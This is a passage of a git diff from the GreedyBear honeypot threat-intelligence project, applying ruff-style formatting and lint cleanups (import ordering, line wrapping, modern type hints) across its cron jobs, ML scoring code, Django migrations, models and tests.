-from greedybear.models import IOC, FireHolList
+from greedybear.models import FireHolList
class FireHolCron(Cronjob):
diff --git a/greedybear/cronjobs/mass_scanners.py b/greedybear/cronjobs/mass_scanners.py
index 81a41279..2a8a7275 100644
--- a/greedybear/cronjobs/mass_scanners.py
+++ b/greedybear/cronjobs/mass_scanners.py
@@ -1,6 +1,7 @@
import re
import requests
+
from greedybear.cronjobs.base import Cronjob
from greedybear.models import IOC, MassScanner
@@ -8,7 +9,10 @@
class MassScannersCron(Cronjob):
def run(self) -> None:
regex_compiled = re.compile(r"(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})\s*#\s*(.+)*", re.DOTALL)
- r = requests.get("https://raw.githubusercontent.com/stamparm/maltrail/master/trails/static/mass_scanner.txt", timeout=10)
+ r = requests.get(
+ "https://raw.githubusercontent.com/stamparm/maltrail/master/trails/static/mass_scanner.txt",
+ timeout=10,
+ )
for line_bytes in r.iter_lines():
if line_bytes:
line = line_bytes.decode("utf-8")
diff --git a/greedybear/cronjobs/repositories/cowrie_session.py b/greedybear/cronjobs/repositories/cowrie_session.py
index be7dc13e..49eb5e87 100644
--- a/greedybear/cronjobs/repositories/cowrie_session.py
+++ b/greedybear/cronjobs/repositories/cowrie_session.py
@@ -1,5 +1,4 @@
import logging
-from typing import Optional
from greedybear.models import IOC, CommandSequence, CowrieSession
@@ -34,7 +33,7 @@ def get_or_create_session(self, session_id: str, source: IOC) -> CowrieSession:
self.log.debug(f"created new session {session_id}" if created else f"{session_id} already exists")
return record
- def get_command_sequence_by_hash(self, commands_hash: str) -> Optional[CommandSequence]:
+ def get_command_sequence_by_hash(self, commands_hash: str) -> CommandSequence | None:
"""
Retrieve a command sequence by its hash.
diff --git a/greedybear/cronjobs/repositories/elastic.py b/greedybear/cronjobs/repositories/elastic.py
index 37e7f008..e62cdc48 100644
--- a/greedybear/cronjobs/repositories/elastic.py
+++ b/greedybear/cronjobs/repositories/elastic.py
@@ -3,6 +3,7 @@
from django.conf import settings
from elasticsearch8.dsl import Q, Search
+
from greedybear.consts import REQUIRED_FIELDS
from greedybear.settings import EXTRACTION_INTERVAL, LEGACY_EXTRACTION
@@ -127,7 +128,11 @@ def _healthcheck(self):
self.log.debug("elastic server is reachable")
-def get_time_window(reference_time: datetime, lookback_minutes: int, extraction_interval: int = EXTRACTION_INTERVAL) -> tuple[datetime, datetime]:
+def get_time_window(
+ reference_time: datetime,
+ lookback_minutes: int,
+ extraction_interval: int = EXTRACTION_INTERVAL,
+) -> tuple[datetime, datetime]:
"""
Calculates a time window that ends at the last completed extraction interval and looks back a specified number of minutes.
diff --git a/greedybear/cronjobs/repositories/ioc.py b/greedybear/cronjobs/repositories/ioc.py
index 45bb41a3..0f40a9fb 100644
--- a/greedybear/cronjobs/repositories/ioc.py
+++ b/greedybear/cronjobs/repositories/ioc.py
@@ -1,5 +1,4 @@
import logging
-from typing import Optional
from greedybear.models import IOC, GeneralHoneypot
@@ -18,7 +17,7 @@ def __init__(self):
"""Initialize the repository and populate the honeypot cache from the database."""
self.log = logging.getLogger(f"{__name__}.{self.__class__.__name__}")
self._honeypot_cache = {hp.name: hp.active for hp in GeneralHoneypot.objects.all()}
- self._honeypot_cache.update({name: True for name in self.SPECIAL_HONEYPOTS})
+ self._honeypot_cache.update(dict.fromkeys(self.SPECIAL_HONEYPOTS, True))
def add_honeypot_to_ioc(self, honeypot_name: str, ioc: IOC) -> IOC:
"""
@@ -63,7 +62,7 @@ def get_active_honeypots(self) -> list[GeneralHoneypot]:
"""
return list(GeneralHoneypot.objects.filter(active=True))
- def get_ioc_by_name(self, name: str) -> Optional[IOC]:
+ def get_ioc_by_name(self, name: str) -> IOC | None:
"""
Retrieve an IOC by its name.
@@ -78,7 +77,7 @@ def get_ioc_by_name(self, name: str) -> Optional[IOC]:
except IOC.DoesNotExist:
return None
- def get_hp_by_name(self, name: str) -> Optional[GeneralHoneypot]:
+ def get_hp_by_name(self, name: str) -> GeneralHoneypot | None:
"""
Retrieve a honeypot by its name.
diff --git a/greedybear/cronjobs/scoring/ml_model.py b/greedybear/cronjobs/scoring/ml_model.py
index dae31f23..12c1e3c9 100644
--- a/greedybear/cronjobs/scoring/ml_model.py
+++ b/greedybear/cronjobs/scoring/ml_model.py
@@ -7,11 +7,12 @@
import pandas as pd
from django.core.files.base import ContentFile
from django.core.files.storage import FileSystemStorage
+from sklearn.model_selection import train_test_split
+
from greedybear.cronjobs.scoring.consts import MULTI_VAL_FEATURES, SAMPLE_COUNT
from greedybear.cronjobs.scoring.scorer import Scorer
from greedybear.cronjobs.scoring.utils import multi_label_encode
from greedybear.settings import ML_MODEL_DIRECTORY
-from sklearn.model_selection import train_test_split
class MLModel(Scorer):
diff --git a/greedybear/cronjobs/scoring/random_forest.py b/greedybear/cronjobs/scoring/random_forest.py
index 073dd31a..bc293547 100755
--- a/greedybear/cronjobs/scoring/random_forest.py
+++ b/greedybear/cronjobs/scoring/random_forest.py
@@ -2,12 +2,13 @@
from abc import abstractmethod
import pandas as pd
+from sklearn.base import BaseEstimator
+from sklearn.ensemble import RandomForestClassifier, RandomForestRegressor
+
from greedybear.cronjobs.scoring.consts import MULTI_VAL_FEATURES, NUM_FEATURES
from greedybear.cronjobs.scoring.ml_model import Classifier, MLModel, Regressor
from greedybear.cronjobs.scoring.utils import multi_label_encode
from greedybear.settings import ML_CONFIG_FILE
-from sklearn.base import BaseEstimator
-from sklearn.ensemble import RandomForestClassifier, RandomForestRegressor
class RFModel(MLModel):
@@ -86,7 +87,7 @@ def untrained_model(self) -> BaseEstimator:
BaseEstimator: Configured but untrained scikit-learn Random Forest
Classifier with all hyperparameters set
"""
- with open(ML_CONFIG_FILE, "r") as f:
+ with open(ML_CONFIG_FILE) as f:
config = json.load(f)
params = config["RFClassifier"]
@@ -118,7 +119,7 @@ def untrained_model(self) -> BaseEstimator:
BaseEstimator: Configured but untrained scikit-learn Random Forest
Regressor with all hyperparameters set
"""
- with open(ML_CONFIG_FILE, "r") as f:
+ with open(ML_CONFIG_FILE) as f:
config = json.load(f)
params = config["RFRegressor"]
diff --git a/greedybear/cronjobs/scoring/scoring_jobs.py b/greedybear/cronjobs/scoring/scoring_jobs.py
index 831798f9..015a40b7 100644
--- a/greedybear/cronjobs/scoring/scoring_jobs.py
+++ b/greedybear/cronjobs/scoring/scoring_jobs.py
@@ -1,15 +1,20 @@
import json
-import logging
from collections import defaultdict
from datetime import date
import pandas as pd
from django.core.files.base import ContentFile
from django.core.files.storage import FileSystemStorage
-from django.db.models import F, Q
+from django.db.models import Q
+
from greedybear.cronjobs.base import Cronjob
from greedybear.cronjobs.scoring.random_forest import RFClassifier, RFRegressor
-from greedybear.cronjobs.scoring.utils import correlated_features, get_current_data, get_data_by_pks, get_features
+from greedybear.cronjobs.scoring.utils import (
+ correlated_features,
+ get_current_data,
+ get_data_by_pks,
+ get_features,
+)
from greedybear.models import IOC
from greedybear.settings import ML_MODEL_DIRECTORY
@@ -47,7 +52,10 @@ def save_training_data(self) -> None:
try:
if self.storage.exists(TRAINING_DATA_FILENAME):
self.storage.delete(TRAINING_DATA_FILENAME)
- self.storage.save(TRAINING_DATA_FILENAME, ContentFile(json.dumps(self.current_data, default=str)))
+ self.storage.save(
+ TRAINING_DATA_FILENAME,
+ ContentFile(json.dumps(self.current_data, default=str)),
+ )
except Exception as exc:
self.log.error(f"error saving training data: {exc}")
raise exc
@@ -110,7 +118,8 @@ def run(self):
raise TrainingDataError()
current_ips = defaultdict(
- int, {ioc["value"]: ioc["interaction_count"] - training_ips.get(ioc["value"], 0) for ioc in self.current_data if ioc["last_seen"] > training_date}
+ int,
+ {ioc["value"]: ioc["interaction_count"] - training_ips.get(ioc["value"], 0) for ioc in self.current_data if ioc["last_seen"] > training_date},
)
self.log.info("extracting features from training data")
@@ -209,7 +218,7 @@ def score_only(self, iocs: list[IOC]) -> int:
int: Number of objects updated
"""
iocs = set(iocs)
- primary_keys = set(ioc.pk for ioc in iocs)
+ primary_keys = {ioc.pk for ioc in iocs}
data = get_data_by_pks(primary_keys)
current_date = str(date.today())
self.log.info("extracting features: score_only")
diff --git a/greedybear/cronjobs/scoring/utils.py b/greedybear/cronjobs/scoring/utils.py
index 174d7ba7..232df1ef 100644
--- a/greedybear/cronjobs/scoring/utils.py
+++ b/greedybear/cronjobs/scoring/utils.py
@@ -3,9 +3,10 @@
import numpy as np
import pandas as pd
-from api.views.utils import FeedRequestParams, feeds_response
from django.contrib.postgres.aggregates import ArrayAgg
from django.db.models import F, Q
+
+from api.views.utils import FeedRequestParams, feeds_response
from greedybear.models import IOC
@@ -67,7 +68,7 @@ def get_features(iocs: list[dict], reference_day: str) -> pd.DataFrame:
result = []
for ioc in iocs:
days_seen_count = len(ioc["days_seen"])
- time_diffs = [date_delta(str(a), str(b)) for a, b in zip(ioc["days_seen"], ioc["days_seen"][1:])]
+ time_diffs = [date_delta(str(a), str(b)) for a, b in zip(ioc["days_seen"], ioc["days_seen"][1:], strict=False)]
active_timespan = sum(time_diffs) + 1
result.append(
{
diff --git a/greedybear/cronjobs/whatsmyip.py b/greedybear/cronjobs/whatsmyip.py
index 3dc00b57..5c2d8d00 100644
--- a/greedybear/cronjobs/whatsmyip.py
+++ b/greedybear/cronjobs/whatsmyip.py
@@ -1,11 +1,15 @@
import requests
+
from greedybear.cronjobs.base import Cronjob
from greedybear.models import IOC, WhatsMyIPDomain
class WhatsMyIPCron(Cronjob):
def run(self) -> None:
- r = requests.get("https://raw.githubusercontent.com/MISP/misp-warninglists/refs/heads/main/lists/whats-my-ip/list.json", timeout=10)
+ r = requests.get(
+ "https://raw.githubusercontent.com/MISP/misp-warninglists/refs/heads/main/lists/whats-my-ip/list.json",
+ timeout=10,
+ )
json_file = r.json()
for domain in json_file["list"]:
try:
diff --git a/greedybear/migrations/0001_initial.py b/greedybear/migrations/0001_initial.py
index 9ecada37..2967a6d4 100644
--- a/greedybear/migrations/0001_initial.py
+++ b/greedybear/migrations/0001_initial.py
@@ -7,7 +7,6 @@
class Migration(migrations.Migration):
-
initial = True
dependencies = []
diff --git a/greedybear/migrations/0002_ioc_cowrie.py b/greedybear/migrations/0002_ioc_cowrie.py
index c2a5fef4..87b3318c 100644
--- a/greedybear/migrations/0002_ioc_cowrie.py
+++ b/greedybear/migrations/0002_ioc_cowrie.py
@@ -4,7 +4,6 @@
class Migration(migrations.Migration):
-
dependencies = [
("greedybear", "0001_initial"),
]
diff --git a/greedybear/migrations/0003_statistics.py b/greedybear/migrations/0003_statistics.py
index bdc38301..56443050 100644
--- a/greedybear/migrations/0003_statistics.py
+++ b/greedybear/migrations/0003_statistics.py
@@ -6,7 +6,6 @@
class Migration(migrations.Migration):
-
dependencies = [
("greedybear", "0002_ioc_cowrie"),
]
diff --git a/greedybear/migrations/0004_alter_id_field.py b/greedybear/migrations/0004_alter_id_field.py
index c162bd0d..c54b572d 100644
--- a/greedybear/migrations/0004_alter_id_field.py
+++ b/greedybear/migrations/0004_alter_id_field.py
@@ -4,7 +4,6 @@
class Migration(migrations.Migration):
-
dependencies = [
("greedybear", "0003_statistics"),
]
diff --git a/greedybear/migrations/0005_clients.py b/greedybear/migrations/0005_clients.py
index 47592ecf..d53aee90 100644
--- a/greedybear/migrations/0005_clients.py
+++ b/greedybear/migrations/0005_clients.py
@@ -16,7 +16,6 @@ def create_default_clients(apps, schema_editor):
class Migration(migrations.Migration):
-
dependencies = [
("greedybear", "0004_alter_id_field"),
# added dependency to enable using models from app2 in move_m1
diff --git a/greedybear/migrations/0006_ioc_general_hps.py b/greedybear/migrations/0006_ioc_general_hps.py
index ae4e668d..b00841dc 100644
--- a/greedybear/migrations/0006_ioc_general_hps.py
+++ b/greedybear/migrations/0006_ioc_general_hps.py
@@ -5,7 +5,6 @@
class Migration(migrations.Migration):
-
dependencies = [
("greedybear", "0005_clients"),
]
diff --git a/greedybear/migrations/0007_generalhoneypot.py b/greedybear/migrations/0007_generalhoneypot.py
index 4b9c545f..7cccfb04 100644
--- a/greedybear/migrations/0007_generalhoneypot.py
+++ b/greedybear/migrations/0007_generalhoneypot.py
@@ -4,7 +4,6 @@
class Migration(migrations.Migration):
-
dependencies = [
("greedybear", "0006_ioc_general_hps"),
]
diff --git a/greedybear/migrations/0008_auto_20230120_1548.py b/greedybear/migrations/0008_auto_20230120_1548.py
index 05b8bea8..45d7076b 100644
--- a/greedybear/migrations/0008_auto_20230120_1548.py
+++ b/greedybear/migrations/0008_auto_20230120_1548.py
@@ -29,7 +29,6 @@ def generalHoneypot(apps, schema_editor):
class Migration(migrations.Migration):
-
dependencies = [
("greedybear", "0007_generalhoneypot"),
]
diff --git a/greedybear/migrations/0009_alter_ioc_general_field.py b/greedybear/migrations/0009_alter_ioc_general_field.py
index 0f950515..e441281f 100644
--- a/greedybear/migrations/0009_alter_ioc_general_field.py
+++ b/greedybear/migrations/0009_alter_ioc_general_field.py
@@ -12,7 +12,6 @@ def migrateData(apps, schema_editor):
class Migration(migrations.Migration):
-
dependencies = [
("greedybear", "0008_auto_20230120_1548"),
]
@@ -31,6 +30,8 @@ class Migration(migrations.Migration):
migrations.AlterField(
model_name="ioc",
name="type",
- field=models.CharField(choices=[("ip", "Ip"), ("domain", "Domain")], max_length=32),
+ field=models.CharField(
+ choices=[("ip", "Ip"), ("domain", "Domain")], max_length=32
+ ),
),
]
diff --git a/greedybear/migrations/0010_alter_ioc_related_ioc.py b/greedybear/migrations/0010_alter_ioc_related_ioc.py
index d20ff9b5..d617f69e 100644
--- a/greedybear/migrations/0010_alter_ioc_related_ioc.py
+++ b/greedybear/migrations/0010_alter_ioc_related_ioc.py
@@ -4,15 +4,14 @@
class Migration(migrations.Migration):
-
dependencies = [
- ('greedybear', '0009_alter_ioc_general_field'),
+ ("greedybear", "0009_alter_ioc_general_field"),
]
operations = [
migrations.AlterField(
- model_name='ioc',
- name='related_ioc',
- field=models.ManyToManyField(blank=True, to='greedybear.ioc'),
+ model_name="ioc",
+ name="related_ioc",
+ field=models.ManyToManyField(blank=True, to="greedybear.ioc"),
),
]
diff --git a/greedybear/migrations/0011_rename_times_seen_ioc_attack_count_ioc_asn_and_more.py b/greedybear/migrations/0011_rename_times_seen_ioc_attack_count_ioc_asn_and_more.py
index 74bfb540..f18be25d 100644
--- a/greedybear/migrations/0011_rename_times_seen_ioc_attack_count_ioc_asn_and_more.py
+++ b/greedybear/migrations/0011_rename_times_seen_ioc_attack_count_ioc_asn_and_more.py
@@ -1,12 +1,11 @@
# Generated by Django 4.2.15 on 2024-12-13 17:37
import django.contrib.postgres.fields
-from django.db import migrations, models
import django.db.models.deletion
+from django.db import migrations, models
class Migration(migrations.Migration):
-
dependencies = [
("greedybear", "0010_alter_ioc_related_ioc"),
]
@@ -25,7 +24,9 @@ class Migration(migrations.Migration):
migrations.AddField(
model_name="ioc",
name="destination_ports",
- field=django.contrib.postgres.fields.ArrayField(base_field=models.IntegerField(), default=list, size=None),
+ field=django.contrib.postgres.fields.ArrayField(
+ base_field=models.IntegerField(), default=list, size=None
+ ),
),
migrations.AddField(
model_name="ioc",
@@ -45,19 +46,36 @@ class Migration(migrations.Migration):
migrations.AlterField(
model_name="ioc",
name="days_seen",
- field=django.contrib.postgres.fields.ArrayField(base_field=models.DateField(), blank=True, default=list, size=None),
+ field=django.contrib.postgres.fields.ArrayField(
+ base_field=models.DateField(), blank=True, default=list, size=None
+ ),
),
migrations.CreateModel(
name="CowrieSession",
fields=[
- ("session_id", models.BigIntegerField(primary_key=True, serialize=False)),
+ (
+ "session_id",
+ models.BigIntegerField(primary_key=True, serialize=False),
+ ),
("start_time", models.DateTimeField(blank=True, null=True)),
("duration", models.FloatField(blank=True, null=True)),
("login_attempt", models.BooleanField(default=False)),
- ("credentials", django.contrib.postgres.fields.ArrayField(base_field=models.CharField(blank=True, max_length=256), default=list, size=None)),
+ (
+ "credentials",
+ django.contrib.postgres.fields.ArrayField(
+ base_field=models.CharField(blank=True, max_length=256),
+ default=list,
+ size=None,
+ ),
+ ),
("command_execution", models.BooleanField(default=False)),
("interaction_count", models.IntegerField(default=0)),
- ("source", models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to="greedybear.ioc")),
+ (
+ "source",
+ models.ForeignKey(
+ on_delete=django.db.models.deletion.CASCADE, to="greedybear.ioc"
+ ),
+ ),
],
),
]
diff --git a/greedybear/migrations/0014_auto_20250210_1258.py b/greedybear/migrations/0014_auto_20250210_1258.py
index 274b32d1..2176294c 100644
--- a/greedybear/migrations/0014_auto_20250210_1258.py
+++ b/greedybear/migrations/0014_auto_20250210_1258.py
@@ -12,7 +12,7 @@ def removeDdospot(apps, schema_editor):
if ddospot.active and IOC.objects.filter(general_honeypot=ddospot).exists():
return
ddospot.delete()
- except GeneralHoneypot.DoesNotExist as e:
+ except GeneralHoneypot.DoesNotExist:
pass
diff --git a/greedybear/migrations/0015_cowriesession_greedybear__source__a3720f_idx.py b/greedybear/migrations/0015_cowriesession_greedybear__source__a3720f_idx.py
index 58fb07be..af50a31a 100644
--- a/greedybear/migrations/0015_cowriesession_greedybear__source__a3720f_idx.py
+++ b/greedybear/migrations/0015_cowriesession_greedybear__source__a3720f_idx.py
@@ -4,7 +4,6 @@
class Migration(migrations.Migration):
-
dependencies = [
("greedybear", "0014_auto_20250210_1258"),
]
@@ -12,6 +11,8 @@ class Migration(migrations.Migration):
operations = [
migrations.AddIndex(
model_name="cowriesession",
- index=models.Index(fields=["source"], name="greedybear__source__a3720f_idx"),
+ index=models.Index(
+ fields=["source"], name="greedybear__source__a3720f_idx"
+ ),
),
]
diff --git a/greedybear/migrations/0017_commandsequence_cowriesession_commands.py b/greedybear/migrations/0017_commandsequence_cowriesession_commands.py
index 5da4be30..a8c7816f 100644
--- a/greedybear/migrations/0017_commandsequence_cowriesession_commands.py
+++ b/greedybear/migrations/0017_commandsequence_cowriesession_commands.py
@@ -16,10 +16,25 @@ class Migration(migrations.Migration):
migrations.CreateModel(
name="CommandSequence",
fields=[
- ("id", models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name="ID")),
+ (
+ "id",
+ models.BigAutoField(
+ auto_created=True,
+ primary_key=True,
+ serialize=False,
+ verbose_name="ID",
+ ),
+ ),
("first_seen", models.DateTimeField(default=datetime.datetime.utcnow)),
("last_seen", models.DateTimeField(default=datetime.datetime.utcnow)),
- ("commands", django.contrib.postgres.fields.ArrayField(base_field=models.CharField(blank=True, max_length=1024), default=list, size=None)),
+ (
+ "commands",
+ django.contrib.postgres.fields.ArrayField(
+ base_field=models.CharField(blank=True, max_length=1024),
+ default=list,
+ size=None,
+ ),
+ ),
("commands_hash", models.CharField(blank=True, max_length=64)),
("cluster", models.IntegerField(blank=True, null=True)),
],
@@ -27,6 +42,11 @@ class Migration(migrations.Migration):
migrations.AddField(
model_name="cowriesession",
name="commands",
- field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to="greedybear.commandsequence"),
+ field=models.ForeignKey(
+ blank=True,
+ null=True,
+ on_delete=django.db.models.deletion.SET_NULL,
+ to="greedybear.commandsequence",
+ ),
),
]
diff --git a/greedybear/migrations/0019_alter_commandsequence_first_seen_and_more.py b/greedybear/migrations/0019_alter_commandsequence_first_seen_and_more.py
index 8f558f9d..1df61fe2 100644
--- a/greedybear/migrations/0019_alter_commandsequence_first_seen_and_more.py
+++ b/greedybear/migrations/0019_alter_commandsequence_first_seen_and_more.py
@@ -40,7 +40,11 @@ class Migration(migrations.Migration):
model_name="statistics",
name="view",
field=models.CharField(
- choices=[("feeds", "Feeds View"), ("enrichment", "Enrichment View"), ("command sequence", "Command Sequence View")],
+ choices=[
+ ("feeds", "Feeds View"),
+ ("enrichment", "Enrichment View"),
+ ("command sequence", "Command Sequence View"),
+ ],
default="feeds",
max_length=32,
),
diff --git a/greedybear/migrations/0020_massscanners.py b/greedybear/migrations/0020_massscanners.py
index 59f227dd..15a4b72e 100644
--- a/greedybear/migrations/0020_massscanners.py
+++ b/greedybear/migrations/0020_massscanners.py
@@ -1,11 +1,11 @@
# Generated by Django 4.2.20 on 2025-07-13 17:26
import datetime
+
from django.db import migrations, models
class Migration(migrations.Migration):
-
dependencies = [
("greedybear", "0019_alter_commandsequence_first_seen_and_more"),
]
@@ -14,7 +14,15 @@ class Migration(migrations.Migration):
migrations.CreateModel(
name="MassScanners",
fields=[
- ("id", models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name="ID")),
+ (
+ "id",
+ models.BigAutoField(
+ auto_created=True,
+ primary_key=True,
+ serialize=False,
+ verbose_name="ID",
+ ),
+ ),
("ip_address", models.CharField(max_length=256)),
("added", models.DateTimeField(default=datetime.datetime.now)),
("reason", models.CharField(blank=True, max_length=64, null=True)),
diff --git a/greedybear/migrations/0021_massscanners_greedybear__ip_addr_2aa484_idx.py b/greedybear/migrations/0021_massscanners_greedybear__ip_addr_2aa484_idx.py
index 3c31766c..4a489d7b 100644
--- a/greedybear/migrations/0021_massscanners_greedybear__ip_addr_2aa484_idx.py
+++ b/greedybear/migrations/0021_massscanners_greedybear__ip_addr_2aa484_idx.py
@@ -4,7 +4,6 @@
class Migration(migrations.Migration):
-
dependencies = [
("greedybear", "0020_massscanners"),
]
@@ -12,6 +11,8 @@ class Migration(migrations.Migration):
operations = [
migrations.AddIndex(
model_name="massscanners",
- index=models.Index(fields=["ip_address"], name="greedybear__ip_addr_2aa484_idx"),
+ index=models.Index(
+ fields=["ip_address"], name="greedybear__ip_addr_2aa484_idx"
+ ),
),
]
diff --git a/greedybear/migrations/0022_whatsmyip.py b/greedybear/migrations/0022_whatsmyip.py
index 1c2d925e..6dc2bdad 100644
--- a/greedybear/migrations/0022_whatsmyip.py
+++ b/greedybear/migrations/0022_whatsmyip.py
@@ -1,11 +1,11 @@
# Generated by Django 4.2.20 on 2025-07-18 17:45
import datetime
+
from django.db import migrations, models
class Migration(migrations.Migration):
-
dependencies = [
("greedybear", "0021_massscanners_greedybear__ip_addr_2aa484_idx"),
]
@@ -14,12 +14,24 @@ class Migration(migrations.Migration):
migrations.CreateModel(
name="WhatsMyIP",
fields=[
- ("id", models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name="ID")),
+ (
+ "id",
+ models.BigAutoField(
+ auto_created=True,
+ primary_key=True,
+ serialize=False,
+ verbose_name="ID",
+ ),
+ ),
("domain", models.CharField(max_length=256)),
("added", models.DateTimeField(default=datetime.datetime.now)),
],
options={
- "indexes": [models.Index(fields=["domain"], name="greedybear__domain_f89b04_idx")],
+ "indexes": [
+ models.Index(
+ fields=["domain"], name="greedybear__domain_f89b04_idx"
+ )
+ ],
},
),
]
diff --git a/greedybear/migrations/0024_ioc_firehol_categories_alter_statistics_view_and_more.py b/greedybear/migrations/0024_ioc_firehol_categories_alter_statistics_view_and_more.py
index 920dd0a6..94441e2c 100644
--- a/greedybear/migrations/0024_ioc_firehol_categories_alter_statistics_view_and_more.py
+++ b/greedybear/migrations/0024_ioc_firehol_categories_alter_statistics_view_and_more.py
@@ -1,12 +1,12 @@
# Generated by Django 5.2.8 on 2025-12-22 11:24
import datetime
+
import django.contrib.postgres.fields
from django.db import migrations, models
class Migration(migrations.Migration):
-
dependencies = [
("greedybear", "0023_rename_massscanners_massscanner_and_more"),
]
@@ -15,7 +15,12 @@ class Migration(migrations.Migration):
migrations.AddField(
model_name="ioc",
name="firehol_categories",
- field=django.contrib.postgres.fields.ArrayField(base_field=models.CharField(blank=True, max_length=64), blank=True, default=list, size=None),
+ field=django.contrib.postgres.fields.ArrayField(
+ base_field=models.CharField(blank=True, max_length=64),
+ blank=True,
+ default=list,
+ size=None,
+ ),
),
migrations.AlterField(
model_name="statistics",
@@ -34,13 +39,25 @@ class Migration(migrations.Migration):
migrations.CreateModel(
name="FireHolList",
fields=[
- ("id", models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name="ID")),
+ (
+ "id",
+ models.BigAutoField(
+ auto_created=True,
+ primary_key=True,
+ serialize=False,
+ verbose_name="ID",
+ ),
+ ),
("ip_address", models.CharField(max_length=256)),
("added", models.DateTimeField(default=datetime.datetime.now)),
("source", models.CharField(blank=True, max_length=64, null=True)),
],
options={
- "indexes": [models.Index(fields=["ip_address"], name="greedybear__ip_addr_e01f2f_idx")],
+ "indexes": [
+ models.Index(
+ fields=["ip_address"], name="greedybear__ip_addr_e01f2f_idx"
+ )
+ ],
},
),
]
diff --git a/greedybear/migrations/0025_merge_20251223_2100.py b/greedybear/migrations/0025_merge_20251223_2100.py
index 583eb4b1..6c52daa5 100644
--- a/greedybear/migrations/0025_merge_20251223_2100.py
+++ b/greedybear/migrations/0025_merge_20251223_2100.py
@@ -4,7 +4,6 @@
class Migration(migrations.Migration):
-
dependencies = [
("greedybear", "0024_ioc_firehol_categories_alter_statistics_view_and_more"),
("greedybear", "0023_rename_massscanners_massscanner_and_more"),
diff --git a/greedybear/models.py b/greedybear/models.py
index 09990f73..88630991 100644
--- a/greedybear/models.py
+++ b/greedybear/models.py
@@ -79,7 +79,12 @@ def __str__(self):
class CommandSequence(models.Model):
first_seen = models.DateTimeField(blank=False, default=datetime.now)
last_seen = models.DateTimeField(blank=False, default=datetime.now)
- commands = pg_fields.ArrayField(models.CharField(max_length=1024, blank=True), blank=False, null=False, default=list)
+ commands = pg_fields.ArrayField(
+ models.CharField(max_length=1024, blank=True),
+ blank=False,
+ null=False,
+ default=list,
+ )
commands_hash = models.CharField(max_length=64, unique=True, blank=True, null=True)
cluster = models.IntegerField(blank=True, null=True)
@@ -93,7 +98,12 @@ class CowrieSession(models.Model):
start_time = models.DateTimeField(blank=True, null=True)
duration = models.FloatField(blank=True, null=True)
login_attempt = models.BooleanField(blank=False, null=False, default=False)
- credentials = pg_fields.ArrayField(models.CharField(max_length=256, blank=True), blank=False, null=False, default=list)
+ credentials = pg_fields.ArrayField(
+ models.CharField(max_length=256, blank=True),
+ blank=False,
+ null=False,
+ default=list,
+ )
command_execution = models.BooleanField(blank=False, null=False, default=False)
interaction_count = models.IntegerField(blank=False, null=False, default=0)
source = models.ForeignKey(IOC, on_delete=models.CASCADE, blank=False, null=False)
diff --git a/greedybear/tasks.py b/greedybear/tasks.py
index 405d8403..f3c24786 100644
--- a/greedybear/tasks.py
+++ b/greedybear/tasks.py
@@ -1,8 +1,8 @@
# This file is a part of GreedyBear https://github.com/honeynet/GreedyBear
# See the file 'LICENSE' for copying permission.
-from __future__ import absolute_import, unicode_literals
from celery import shared_task
+
from greedybear.settings import CLUSTER_COWRIE_COMMAND_SEQUENCES
diff --git a/manage.py b/manage.py
index 1d24ff43..1131716f 100644
--- a/manage.py
+++ b/manage.py
@@ -2,6 +2,7 @@
"""Django's command-line utility for administrative tasks."""
+
import os
import sys
diff --git a/packages.txt b/packages.txt
new file mode 100644
index 00000000..e69de29b
diff --git a/pyproject.toml b/pyproject.toml
new file mode 100644
index 00000000..79d5a937
--- /dev/null
+++ b/pyproject.toml
@@ -0,0 +1,2 @@
+[tool.ruff]
+extend = ".github/configurations/python_linters/.ruff.toml"
diff --git a/tests/__init__.py b/tests/__init__.py
index 00a68e29..5226f137 100644
--- a/tests/__init__.py
+++ b/tests/__init__.py
@@ -4,13 +4,20 @@
from certego_saas.apps.user.models import User
from django.test import TestCase
-from greedybear.models import IOC, CommandSequence, CowrieSession, GeneralHoneypot, iocType
+
+from greedybear.models import (
+ IOC,
+ CommandSequence,
+ CowrieSession,
+ GeneralHoneypot,
+ iocType,
+)
class CustomTestCase(TestCase):
@classmethod
def setUpTestData(cls):
- super(CustomTestCase, cls).setUpTestData()
+ super().setUpTestData()
cls.heralding = GeneralHoneypot.objects.create(name="Heralding", active=True)
cls.ciscoasa = GeneralHoneypot.objects.create(name="Ciscoasa", active=True)
@@ -171,7 +178,7 @@ def setUpTestData(cls):
cls.regular_user = User.objects.create_user(username="regular", email="regular@greedybear.com", password="regular")
@classmethod
- def tearDownClass(self):
+ def tearDownClass(cls):
# db clean
GeneralHoneypot.objects.all().delete()
IOC.objects.all().delete()
diff --git a/tests/authentication/test_auth.py b/tests/authentication/test_auth.py
index 29bcbc50..c1103efa 100644
--- a/tests/authentication/test_auth.py
+++ b/tests/authentication/test_auth.py
@@ -68,7 +68,7 @@ def test_logout_204(self):
)
self.assertEqual(AuthToken.objects.count(), 1)
- self.client.credentials(HTTP_AUTHORIZATION=("Token %s" % token.token))
+ self.client.credentials(HTTP_AUTHORIZATION=(f"Token {token.token}"))
response = self.client.post(logout_uri)
self.assertEqual(response.status_code, 204, msg=(response))
@@ -302,7 +302,11 @@ def __register_user(self, body: dict):
class CheckConfigurationTestCase(CustomOAuthTestCase):
def test_200_local_setup(self):
- with self.settings(DEFAULT_FROM_EMAIL="fake@email.it", DEFAULT_EMAIL="fake@email.it", STAGE_LOCAL="true"):
+ with self.settings(
+ DEFAULT_FROM_EMAIL="fake@email.it",
+ DEFAULT_EMAIL="fake@email.it",
+ STAGE_LOCAL="true",
+ ):
# register page has been removed
# response = self.client.get("/api/auth/configuration?page=register")
# self.assertEqual(response.status_code, 200)
diff --git a/tests/greedybear/cronjobs/test_firehol.py b/tests/greedybear/cronjobs/test_firehol.py
index 7264f48e..bdbaefb5 100644
--- a/tests/greedybear/cronjobs/test_firehol.py
+++ b/tests/greedybear/cronjobs/test_firehol.py
@@ -1,7 +1,7 @@
from unittest.mock import MagicMock, patch
from greedybear.cronjobs.firehol import FireHolCron
-from greedybear.models import IOC, FireHolList
+from greedybear.models import FireHolList
from tests import CustomTestCase
diff --git a/tests/test_clustering.py b/tests/test_clustering.py
index 3b16e1d7..2585086a 100644
--- a/tests/test_clustering.py
+++ b/tests/test_clustering.py
@@ -1,4 +1,3 @@
-import numpy as np
